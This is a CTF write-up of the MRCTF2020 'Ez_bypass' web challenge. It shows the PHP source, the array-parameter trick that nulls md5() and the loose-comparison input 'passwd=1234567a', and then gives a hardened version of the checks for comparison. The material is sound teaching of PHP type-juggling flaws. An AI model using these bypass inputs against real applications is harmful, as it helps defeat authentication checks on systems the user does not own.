BUUCTF WEB [MRCTF2020]Ez_bypass


  • Enter the environment; the page shows the following hint:

    I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }Please input first
    
  • From this, the site's source code can be inferred to be:

    // Page text: I put something in F12 for you
    include 'flag.php';
    $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
    if(isset($_GET['gg'])&&isset($_GET['id'])) {
        $id=$_GET['id'];
        $gg=$_GET['gg'];
        if (md5($id) === md5($gg) && $id !== $gg) {
            echo 'You got the first step';
            if(isset($_POST['passwd'])) {
                $passwd=$_POST['passwd'];
                if (!is_numeric($passwd))
                {
                     if($passwd==1234567)
                     {
                         echo 'Good Job!';
                         highlight_file('flag.php');
                         die('By Retr_0');
                     }
                     else
                     {
                         echo "can you think twice??";
                     }
                }
                else{
                    echo 'You can not get it !';
                }
    
            }
            else{
                die('only one way to get the flag');
            }
        }
        else {
            echo "You are not a real hacker!";
        }
    }
    else{
        die('Please input first');
    }
    // Output when no parameters are sent: Please input first
    
    
  • First filter

    if (md5($id) === md5($gg) && $id !== $gg)
    

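    This can be bypassed by passing arrays: md5() returns NULL for an array argument (with the warning shown below), so both sides of === are NULL, while the two arrays themselves are not identical.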

    ?id[]=1&gg[]=2
    

    Response:

    Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
    
    Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
    You got the first steponly one way to get the flag
    
  • Second filter

    if (!is_numeric($passwd)) {
        if($passwd==1234567) {
    

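    This is a PHP weak-type (loose) comparison. The string 1234567a is not numeric, so it passes !is_numeric(), but == converts it to the integer 1234567 before comparing. It is enough to submit in the POST body: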

    passwd=1234567a
    

    Response:

    Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
    
    Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
    You got the first stepGood Job!  By Retr_0
    
  • Get the flag

    flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}
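
For comparison, the two checks with explicit type validation, written as an added example (not the challenge's code). The function names `digests_match` and `passwd_ok`, the constant `EXPECTED_PASSWD` and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's source. Names below are hypothetical.

const EXPECTED_PASSWD = '1234567';

// First check, hardened: only strings may reach md5(), so array inputs such
// as ?id[]=1&gg[]=2 can never make both digests NULL.
function digests_match($id, $gg): bool
{
    if (!is_string($id) || !is_string($gg)) {
        return false;
    }
    return $id !== $gg && hash_equals(md5($id), md5($gg));
}

// Second check, hardened: the value must be a digits-only string and is
// compared as a string, so "1234567a" is never juggled to the integer 1234567.
function passwd_ok($passwd): bool
{
    return is_string($passwd)
        && ctype_digit($passwd)
        && hash_equals(EXPECTED_PASSWD, $passwd);
}

// Constructed inputs; the first row uses the values from the write-up.
$cases = [
    ['id' => ['1'], 'gg' => ['2'], 'passwd' => '1234567a'],
    ['id' => 'a',   'gg' => 'b',   'passwd' => '1234567'],
    ['id' => 'a',   'gg' => 'a',   'passwd' => ['1234567']],
];

foreach ($cases as $c) {
    printf(
        "%s -> digests_match=%s passwd_ok=%s\n",
        json_encode($c),
        var_export(digests_match($c['id'], $c['gg']), true),
        var_export(passwd_ok($c['passwd']), true)
    );
}
```

On PHP 8 the original code already behaves differently: md5() throws a TypeError for an array and "1234567a" == 1234567 evaluates to false. The explicit checks above keep the result independent of the PHP version.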
    
    
